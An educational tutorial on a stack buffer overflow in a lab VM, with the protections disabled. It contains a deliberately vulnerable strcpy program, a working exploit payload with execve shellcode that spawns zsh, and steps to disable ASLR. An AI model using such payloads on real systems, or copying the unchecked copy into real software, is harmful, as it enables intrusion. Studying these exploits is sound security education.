Using Buffer Overflow to Execute Shell Code
By Matthew Loong
Introduction to Memory Allocation
A process's memory includes, among other regions, a stack and a heap. The stack starts at high addresses and grows toward low addresses; it is managed automatically through the ESP (stack pointer) and EBP (base pointer) registers, and it also stores the return address that is later loaded into EIP (the instruction pointer). The heap starts at low addresses and grows toward high addresses; it is allocated dynamically through functions such as malloc() in C.
In this article, I will demonstrate how to exploit a buffer overflow vulnerability on the stack, first to crash the program and then to execute shell code.
Preliminary Set Up
The VM used is Seed Ubuntu 12.04.
Before any execution, address space layout randomization (ASLR) must be disabled. ASLR is a protection that randomizes where regions such as the stack are placed in memory, so that an attacker cannot rely on predictable stack addresses when overflowing a buffer. On Linux the setting is kernel.randomize_va_space: a value of 2 indicates that ASLR is enabled, and setting it to 0 disables it.
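As a rough illustration of the setting described above, the Python sketch below reads the value that Linux exposes in /proc/sys/kernel/randomize_va_space and labels it. The helper names describe_aslr and read_aslr are hypothetical and not part of the original setup; the sketch only reads the setting and never changes it.

```python
from pathlib import Path

# Linux exposes the ASLR mode through this procfs file.
ASLR_PATH = Path("/proc/sys/kernel/randomize_va_space")

# Meanings of the three values defined by the Linux kernel.
ASLR_MODES = {
    0: "disabled",
    1: "partial (stack, mmap base and VDSO randomized)",
    2: "full (as 1, plus the heap)",
}


def describe_aslr(value):
    """Hypothetical helper: map a randomize_va_space value to a label."""
    return ASLR_MODES.get(value, "unknown")


def read_aslr(path=ASLR_PATH):
    """Return the current setting, or None if the file is unavailable."""
    try:
        return int(path.read_text().strip())
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    current = read_aslr()
    if current is None:
        print("ASLR setting not available on this system")
    else:
        print("randomize_va_space = %d: %s" % (current, describe_aslr(current)))
```

Changing the value requires root, for example with sysctl -w kernel.randomize_va_space=0 inside the lab VM.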
Compiling the Vulnerable Script
For this demonstration, we compile a C program called vuln.c, shown below. It is vulnerable because it uses the function strcpy(), which does not check the length of the destination buffer before copying the string. If the destination is not large enough to hold the string, the behavior is undefined: the copy overflows the buffer and may crash the program.
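/*vuln.c*/
#include <stdio.h>
#include <string.h>

int main (int argc, char** argv)
{
    char buffer[500];

    /* Deliberately unsafe: strcpy() copies argv[1] without checking
       that it fits into the 500-byte buffer. */
    strcpy(buffer, argv[1]);
    return 0;
}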
We include the option ‘-fno-stack-protector’ while compiling to disable the stack smashing protector. If the protector is not disabled, the program would be terminated as soon as our buffer overflow attack corrupts the stack, with a “stack smashing detected” error message.
Running disas main in the debugger (gdb) shows the offset $0x1fc, which is 508 in decimal: ESP sits 508 bytes below the address held in EBP.
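The hexadecimal offset can be checked with a couple of lines of Python. This is only a sanity check of the arithmetic; the names BUFFER_SIZE and frame_offset are chosen here for illustration.

```python
BUFFER_SIZE = 500      # char buffer[500] in vuln.c
frame_offset = 0x1fc   # offset reported by disas main

# Convert the hexadecimal offset to decimal.
print(frame_offset)                # 508

# Bytes between the end of the declared buffer and the address in EBP.
print(frame_offset - BUFFER_SIZE)  # 8
```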
Stack Smashing
When the string 'Hello' is copied into the buffer, the program exits without error because the buffer can accommodate it. But when $(python -c 'print "\x41" * 508') is passed as the argument, the 500-byte buffer is exceeded and the string spills past its end, causing a segmentation fault. The diagram below represents the two scenarios.
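The two scenarios can be mimicked with a small Python model. This is a simplified sketch, not the real stack: memory is a plain bytearray, REGION_SIZE is a hypothetical size chosen to leave room after the buffer, and unchecked_copy is an illustrative stand-in for strcpy().

```python
BUFFER_SIZE = 500   # char buffer[500] in vuln.c
REGION_SIZE = 520   # hypothetical: the buffer plus some adjacent stack bytes


def unchecked_copy(memory, data):
    """Mimic strcpy(): copy data plus a terminating NUL with no bounds check.

    Returns the number of bytes written beyond the declared buffer.
    """
    written = data + b"\x00"
    if len(written) > len(memory):
        raise ValueError("model region too small for this input")
    memory[:len(written)] = written
    return max(0, len(written) - BUFFER_SIZE)


# Scenario 1: a short string fits, nothing spills over.
print(unchecked_copy(bytearray(REGION_SIZE), b"Hello"))      # 0

# Scenario 2: 508 'A' bytes plus the NUL overrun the buffer by 9 bytes.
print(unchecked_copy(bytearray(REGION_SIZE), b"A" * 508))    # 9
```

In the real program those extra bytes land on whatever the compiler placed next to the buffer, which is what leads to the segmentation fault.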
Executing Shell Code
Before we proceed further, we need to understand what a No Operation (NOP) sled is. A NOP sled is a long sequence of NOP instructions (byte \x90 on x86) placed before the shell code, and it is often included in an exploit to increase the likelihood of success. Whenever the program branches to any address within the sled, execution slides through the NOPs to the final, desired destination: the shell code.
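The sliding behavior can be illustrated with a toy model in Python. It does not execute anything: slide is a hypothetical helper that skips over \x90 bytes the way the CPU would step through NOPs, and the two \xcc bytes are a placeholder standing in for real shell code.

```python
NOP = 0x90


def slide(memory, entry):
    """Return the offset of the first non-NOP byte at or after `entry`."""
    pos = entry
    while pos < len(memory) and memory[pos] == NOP:
        pos += 1
    return pos


sled_len = 16
placeholder = b"\xcc\xcc"                 # stands in for the shell code
memory = bytes([NOP]) * sled_len + placeholder

# Any entry point inside the sled ends up at the same place.
for entry in (0, 5, 15):
    print(entry, "->", slide(memory, entry))
```

Every entry point prints the same destination, offset 16, which is why the jump target only has to be approximately right.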
We first run the program with an initial payload in which the return address is still a placeholder (\x51\x51\x51\x51 repeated 10 times):
$(python -c 'print "\x90" * 426 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x51\x51\x51\x51" * 10')
Examining memory in the debugger with x/200x ($esp - 550), we get the following result.
The total buffer space is 508 bytes. By counting, the shell code is 43 bytes and the repeated return address takes 4 x 10 = 40 bytes. Hence, the NOP sled that fills the remaining space must be 508 - 43 - 40 = 425 bytes long. To jump to the shell code, we overwrite the saved return address, which is loaded into EIP when main returns, with an address that points into the NOP sled (\x90). To leave comfortable room for error, we pick an address somewhere in the middle of the sled, i.e. 0xbffffaea, which in little-endian byte order is \xea\xfa\xff\xbf.
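The arithmetic and the byte order can be double-checked in Python. This is a small sketch using the figures from the text; the constant names are illustrative, and struct.pack with the "<I" format produces a 4-byte little-endian unsigned integer.

```python
import struct

TOTAL = 508            # total buffer space, per the text
SHELLCODE_LEN = 43     # length of the shell code
ADDRESS_SIZE = 4       # one 32-bit return address
ADDRESS_COPIES = 10    # the address is repeated 10 times

# Space left over for the NOP sled.
sled_len = TOTAL - SHELLCODE_LEN - ADDRESS_SIZE * ADDRESS_COPIES
print(sled_len)        # 425

# Little-endian encoding stores the least significant byte first.
ret = struct.pack("<I", 0xbffffaea)
print(ret.hex())       # eafaffbf
```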
We then run the program with the new payload as its argument:
$(python -c 'print ("\x90" * 425) +"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"+("\xea\xfa\xff\xbf"*10)')
We get the zsh shell.
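For readers who prefer to see the pieces separately, the same payload can be assembled as a bytes object in Python 3. This is a sketch that only builds and inspects the bytes; build_payload and its parameters are hypothetical names, and the shell code is copied unchanged from the command above.

```python
import struct

# Shell code bytes from the one-liner above. The operands of its three
# push instructions spell out /zsh, /bin and /usr, i.e. /usr/bin/zsh.
SHELLCODE = bytes.fromhex(
    "31 c0 83 ec 01 88 04 24"
    "68 2f 7a 73 68"
    "68 2f 62 69 6e"
    "68 2f 75 73 72"
    "89 e6 50 56 b0 0b 89 f3 89 e1 31 d2 cd 80"
    "b0 01 31 db cd 80"
)


def build_payload(sled_len=425, ret_addr=0xbffffaea, copies=10):
    """Assemble NOP sled + shell code + repeated little-endian address."""
    sled = b"\x90" * sled_len
    address = struct.pack("<I", ret_addr)
    return sled + SHELLCODE + address * copies


payload = build_payload()
print(len(SHELLCODE))   # 43
print(len(payload))     # 508
```

Note that under Python 3 the raw bytes would have to be emitted with sys.stdout.buffer.write(payload); print on a str would encode characters such as \x90 as multi-byte UTF-8 and corrupt the payload.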
The diagram below represents what is happening on the stack. The overwritten return address sends EIP into the NOP sled, and execution slides down the sled into the shell code.
Conclusion
The shell code demonstrated above is only one of many that can be executed. Others serve different purposes, including obtaining a root shell. You can find these shell codes in the links below.